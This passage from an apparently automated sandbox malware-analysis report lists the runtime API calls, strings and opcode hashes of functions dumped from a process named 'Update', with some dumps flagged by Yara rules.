                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                • String ID:
                                                                                                • API String ID: 781180411-0
                                                                                                • Opcode ID: 0a01c43476d108d4c9d86bcd5ae0e752dcea8e710ecd95c49a8faa49c4d187ed
                                                                                                • Instruction ID: 877ff296740ff87ffef8dcd6d6c63871bb1eb85cd0bb9270c275db20a0a7633c
                                                                                                • Opcode Fuzzy Hash: 0a01c43476d108d4c9d86bcd5ae0e752dcea8e710ecd95c49a8faa49c4d187ed
                                                                                                • Instruction Fuzzy Hash: 22E04F3A81865967FB01ABF18D4E8CF366CEF052D5B158420FA189701BDB38E90146A1
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strlen
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 4218353326-1866435925
                                                                                                • Opcode ID: bc7f26f953e7df54816cec106f98d236a8cadad622cf8dae8f808db9e4aa7cee
                                                                                                • Instruction ID: 0f557609cee97d8546b7112d7086f8b8d4aeccb55627bf0189e9c79d2a6c16e8
                                                                                                • Opcode Fuzzy Hash: bc7f26f953e7df54816cec106f98d236a8cadad622cf8dae8f808db9e4aa7cee
                                                                                                • Instruction Fuzzy Hash: 5CC16E75A016158FDB04CF68C580BADBBF1FF48328F688258E925AB795C335ED85CB90
                                                                                                APIs
                                                                                                  • Part of subcall function 6CA9B2CF: __EH_prolog3.LIBCMT ref: 6CA9B2D6
                                                                                                  • Part of subcall function 6CA9B2CF: std::_Lockit::_Lockit.LIBCPMT ref: 6CA9B2E1
                                                                                                  • Part of subcall function 6CA9B2CF: std::locale::_Setgloballocale.LIBCPMT ref: 6CA9B2FC
                                                                                                  • Part of subcall function 6CA9B2CF: _Yarn.LIBCPMT ref: 6CA9B312
                                                                                                  • Part of subcall function 6CA9B2CF: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA9B34F
                                                                                                  • Part of subcall function 6CA84CA0: std::_Lockit::_Lockit.LIBCPMT ref: 6CA84CD5
                                                                                                  • Part of subcall function 6CA84CA0: std::_Lockit::_Lockit.LIBCPMT ref: 6CA84CEF
                                                                                                  • Part of subcall function 6CA84CA0: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA84D10
                                                                                                  • Part of subcall function 6CA84CA0: __Getctype.LIBCPMT ref: 6CA84DC4
                                                                                                  • Part of subcall function 6CA84CA0: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA84DF7
                                                                                                • std::ios_base::_Addstd.LIBCPMT ref: 6CA8BE72
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$AddstdGetctypeH_prolog3SetgloballocaleYarnstd::ios_base::_std::locale::_
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 3375204848-1866435925
                                                                                                • Opcode ID: 2b1994204222862acfece24b8e370d9784deb0117d5d5711d3cedc315e2dd207
                                                                                                • Instruction ID: 6aaf642dd410526f8b428478202b1d2710b5d7eb258419ee6822f66958958742
                                                                                                • Opcode Fuzzy Hash: 2b1994204222862acfece24b8e370d9784deb0117d5d5711d3cedc315e2dd207
                                                                                                • Instruction Fuzzy Hash: 4851BFB0E023098FDB04CF64D8457AEBBB1FF49314F148268E5165BB90E775A985CB91
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 037F944A
                                                                                                  • Part of subcall function 037FEF86: std::exception::exception.LIBCMT ref: 037FEF9B
                                                                                                  • Part of subcall function 037FEF86: __CxxThrowException@8.LIBCMT ref: 037FEFB0
                                                                                                  • Part of subcall function 037FEF86: std::exception::exception.LIBCMT ref: 037FEFC1
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 037F9482
                                                                                                  • Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF4E
                                                                                                  • Part of subcall function 037FEF39: __CxxThrowException@8.LIBCMT ref: 037FEF63
                                                                                                  • Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF74
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 1823113695-4289949731
                                                                                                • Opcode ID: 875e8b9ea7885624902e746c3434f8b40af6376ee8c8d181f80b265e38c3f30c
                                                                                                • Instruction ID: d231470a8ba274a445a35b61c1d31be5c22d6bb404ef338c6e896822cb6100d1
                                                                                                • Opcode Fuzzy Hash: 875e8b9ea7885624902e746c3434f8b40af6376ee8c8d181f80b265e38c3f30c
                                                                                                • Instruction Fuzzy Hash: AE21A7337006109FC720DE9CE880B6AF799FBA2664B14096FE392CB791D761D844C7A1
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 037F84C9
                                                                                                  • Part of subcall function 037FEF86: std::exception::exception.LIBCMT ref: 037FEF9B
                                                                                                  • Part of subcall function 037FEF86: __CxxThrowException@8.LIBCMT ref: 037FEFB0
                                                                                                  • Part of subcall function 037FEF86: std::exception::exception.LIBCMT ref: 037FEFC1
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 037F84E7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 963545896-4289949731
                                                                                                • Opcode ID: b28a5db343af6c574a433e9011a2143c72f52073714001add9bdfd22aeeea4c6
                                                                                                • Instruction ID: 2b02b171229d19c8589cb9260f6de7840b4dd5d05db48362f2de4bdf0749bac9
                                                                                                • Opcode Fuzzy Hash: b28a5db343af6c574a433e9011a2143c72f52073714001add9bdfd22aeeea4c6
                                                                                                • Instruction Fuzzy Hash: 4A217276700706EF8B14DF6CE880C69B3A9BF88314714466AF616CF751E730E954C792
                                                                                                APIs
                                                                                                • __current_exception.VCRUNTIME140 ref: 006E17AF
                                                                                                • __current_exception_context.VCRUNTIME140 ref: 006E17B9
                                                                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 006E17C0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e0000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: __current_exception__current_exception_contextterminate
                                                                                                • String ID: csm
                                                                                                • API String ID: 2542180945-1018135373
                                                                                                • Opcode ID: 41fdafd931ad9aaddf137b82d0d58c14b10d2b972e8e795f6593ee17b9bb6dd7
                                                                                                • Instruction ID: d91b205ca003a08fb08fc6f18e9aab1cfe602643c53c4fcc98283af38c7b5c7a
                                                                                                • Opcode Fuzzy Hash: 41fdafd931ad9aaddf137b82d0d58c14b10d2b972e8e795f6593ee17b9bb6dd7
                                                                                                • Instruction Fuzzy Hash: 8FF0A7354023804F8F345E2B94855DDB76FAE63B613540559D484CFB10DB30ED91E6D5
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6CAB3F2D,?,?,00000000,?,?,?,6CAB3DEB,00000002,FlsGetValue,6CAC17C4,6CAC17CC), ref: 6CAB3E9E
                                                                                                • GetLastError.KERNEL32(?,6CAB3F2D,?,?,00000000,?,?,?,6CAB3DEB,00000002,FlsGetValue,6CAC17C4,6CAC17CC,?,?,6CAA93D1), ref: 6CAB3EA8
                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,?), ref: 6CAB3ED0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 3177248105-2084034818
                                                                                                • Opcode ID: 1ae3f6110644f0a269bd59f5257b72172f3f7a00206fd7657e9ab946ac39f8cd
                                                                                                • Instruction ID: bb0222692d6fd0ef21f463cca7c83a14eb370d044733ab9b42e9438ebceda852
                                                                                                • Opcode Fuzzy Hash: 1ae3f6110644f0a269bd59f5257b72172f3f7a00206fd7657e9ab946ac39f8cd
                                                                                                • Instruction Fuzzy Hash: 69E04F31385309BBEF051EA2DC0AB593BBDAB01B45F248421FA4CF9990DB71F6A1D754
                                                                                                APIs
                                                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 037FD868
                                                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 037FD938
                                                                                                • SetLastError.KERNEL32(0000007F), ref: 037FD963
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Read$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 2715074504-0
                                                                                                • Opcode ID: ffe32ce8a60d820e79a0e1d7296aab46fcc1b1f8490919563c90442f6d79b20f
                                                                                                • Instruction ID: cfa6b5a92fd2ed184ab580d16b1511a887f1f7d206991e44edce25527ddf814e
                                                                                                • Opcode Fuzzy Hash: ffe32ce8a60d820e79a0e1d7296aab46fcc1b1f8490919563c90442f6d79b20f
                                                                                                • Instruction Fuzzy Hash: A5419B71A00209AFDB20CFA9D880B6AF3F9FF88314F148599E95997354D774F901CB90
                                                                                                APIs
                                                                                                • GetConsoleOutputCP.KERNEL32(9AFB9AC3,00000000,00000000,?), ref: 6CAB1629
                                                                                                  • Part of subcall function 6CAAA751: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CAAD550,?,00000000,-00000008), ref: 6CAAA7B2
                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6CAB187B
                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CAB18C1
                                                                                                • GetLastError.KERNEL32 ref: 6CAB1964
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                • String ID:
                                                                                                • API String ID: 2112829910-0
                                                                                                • Opcode ID: 6922418293e99df35a29574f1c440b0651b419904b0663d9e0939de47d6ccfba
                                                                                                • Instruction ID: d57c95356d964ef4c89efef4e6b29e6e0f43e885d17f88dcd9adb9a28bdc6fdd
                                                                                                • Opcode Fuzzy Hash: 6922418293e99df35a29574f1c440b0651b419904b0663d9e0939de47d6ccfba
                                                                                                • Instruction Fuzzy Hash: C8D15A75E042899FCB05CFE8C8809EDBBB9FF09314F28456AE565BB741D630E986CB50
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: AdjustPointer
                                                                                                • String ID:
                                                                                                • API String ID: 1740715915-0
                                                                                                • Opcode ID: c81c34666e451196e31115adead93acfa6ac57fb1d4971ee0f112e7f8b9887fb
                                                                                                • Instruction ID: 0d2919be66c3937e17bac5fc7bf213b67cd579ebc3738e8e6dea0060778986e3
                                                                                                • Opcode Fuzzy Hash: c81c34666e451196e31115adead93acfa6ac57fb1d4971ee0f112e7f8b9887fb
                                                                                                • Instruction Fuzzy Hash: EB51E671606606AFDB159FA4CB81BAA77B4EF45308F24452ED81547A90E732D8CBC790
                                                                                                APIs
                                                                                                • _strlen.LIBCMT ref: 6CA852FB
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 6CA853A7
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 6CA853B3
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 6CA853BF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::cancel_current_task$_strlen
                                                                                                • String ID:
                                                                                                • API String ID: 3047427315-0
                                                                                                • Opcode ID: 0ef88f72077c1bd6bd391a7d943bc2c48525449375c985df631a4a534caeb399
                                                                                                • Instruction ID: 16ecd58b62e3e4a28845e0dc353e1320a4660741fc9c31d9e32de4e3ff27fac4
                                                                                                • Opcode Fuzzy Hash: 0ef88f72077c1bd6bd391a7d943bc2c48525449375c985df631a4a534caeb399
                                                                                                • Instruction Fuzzy Hash: 2C41CFB1C017488FEB10CFA4D9457AEBBF4AF05318F084529D9565BB80E7B5D68CCBA1
                                                                                                APIs
                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0380A5F6
                                                                                                • __isleadbyte_l.LIBCMT ref: 0380A629
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0380A65A
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0380A6C8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                • String ID:
                                                                                                • API String ID: 3058430110-0
                                                                                                • Opcode ID: bb2bfc39d16de7b9575330f05a955cfd8d150c0136d4ecf81a81e1c92cebc444
                                                                                                • Instruction ID: beee0978e9018193b05fb10aa5d20a3748e15b5fb3785b7d01725e5780efbeec
                                                                                                • Opcode Fuzzy Hash: bb2bfc39d16de7b9575330f05a955cfd8d150c0136d4ecf81a81e1c92cebc444
                                                                                                • Instruction Fuzzy Hash: 67318731A00346AFDB68DFE4CC909BE7BB9BB02210F0885E9E461CB1E0E734D980CB50
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6CA84EA5
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6CA84EC2
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA84EE3
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA84F79
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                • String ID:
                                                                                                • API String ID: 593203224-0
                                                                                                • Opcode ID: af3d7d6a9351bb98fa3996d6381d884540a86e5923f3cb90344211481dac3c83
                                                                                                • Instruction ID: 6952604c4b7b0059a215ca4f55a4ccc6e33d3da47237e0b77212b483dcb0f56a
                                                                                                • Opcode Fuzzy Hash: af3d7d6a9351bb98fa3996d6381d884540a86e5923f3cb90344211481dac3c83
                                                                                                • Instruction Fuzzy Hash: E8417B71D012198FCB14EF94D954BDEB7B4FF08728F088229E815AB750E735AD89CBA0
                                                                                                APIs
                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000E459
                                                                                                • __isleadbyte_l.LIBCMT ref: 1000E48C
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 1000E4BD
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 1000E52B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                • String ID:
                                                                                                • API String ID: 3058430110-0
                                                                                                • Opcode ID: faff6b0e24b146ed5f76b5f803dc00f384076012b6a75b333959b6e0697892ea
                                                                                                • Instruction ID: 678bb179593d23e830fa626ca8f93fbb1acc7737e5ff7f739f33e090e4c13c79
                                                                                                • Opcode Fuzzy Hash: faff6b0e24b146ed5f76b5f803dc00f384076012b6a75b333959b6e0697892ea
                                                                                                • Instruction Fuzzy Hash: 9731AE71A042D6EFEB10CFA4C884AAD3BE6EF013D1B1585A9E4A4AB099D730DD40DB51
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6CA82EE5
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6CA82EFF
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA82F20
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA82FF5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                • String ID:
                                                                                                • API String ID: 593203224-0
                                                                                                • Opcode ID: 0869ac0764358e08338cdcd9d90fab7aab3259942dc74436709e29cba08029e7
                                                                                                • Instruction ID: ba8389c03dab6204bd862b7c168c0ed8e0b3629b8724a87bb3a2a59b93a313e0
                                                                                                • Opcode Fuzzy Hash: 0869ac0764358e08338cdcd9d90fab7aab3259942dc74436709e29cba08029e7
                                                                                                • Instruction Fuzzy Hash: 6B416971E012158FCB14DF98C545BAEB7F1FF48718F088219D859ABB90DB34AE89CB90
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6CA8CBA5
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6CA8CBBF
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA8CBE0
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA8CCB5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                • String ID:
                                                                                                • API String ID: 593203224-0
                                                                                                • Opcode ID: fcecfa4dfcb7c3f92837215604191c47333b3c6ff0b65918c69430de6dc428a1
                                                                                                • Instruction ID: 83dab1db873727308860e6fb74c2fa43f9fd271357b3a287302d4ac0c0c36b9d
                                                                                                • Opcode Fuzzy Hash: fcecfa4dfcb7c3f92837215604191c47333b3c6ff0b65918c69430de6dc428a1
                                                                                                • Instruction Fuzzy Hash: 34416AB5E012198FCB14EF98C545B9EB7F1FF48B18F088219D859ABB50D734A989CF90
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6CA8B515
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6CA8B52F
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA8B550
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA8B625
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                • String ID:
                                                                                                • API String ID: 593203224-0
                                                                                                • Opcode ID: 4b369e11cefa9bc53416c13825507f15268cbb7075740ff9025095ed2329590d
                                                                                                • Instruction ID: dfe589d7bb1dd34bee3c66c7dfd664645b8ae1b6998b7395173009a50a1cfbbd
                                                                                                • Opcode Fuzzy Hash: 4b369e11cefa9bc53416c13825507f15268cbb7075740ff9025095ed2329590d
                                                                                                • Instruction Fuzzy Hash: DE418BB1E012198FCB18DF94D951BDEB7F1FB44718F088229D455AB780DB30A989CB90
                                                                                                APIs
                                                                                                • timeGetTime.WINMM ref: 00C74425
                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 00C74434
                                                                                                • WaitForSingleObject.KERNEL32(?,00001770), ref: 00C74482
